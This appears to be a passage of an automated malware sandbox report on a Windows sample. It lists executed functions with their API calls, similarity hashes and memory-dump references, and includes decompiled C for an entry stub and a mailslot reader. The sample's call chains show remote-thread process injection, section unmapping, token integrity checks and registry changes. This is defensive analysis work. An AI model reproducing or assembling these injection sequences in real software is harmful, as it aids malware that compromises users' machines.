0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
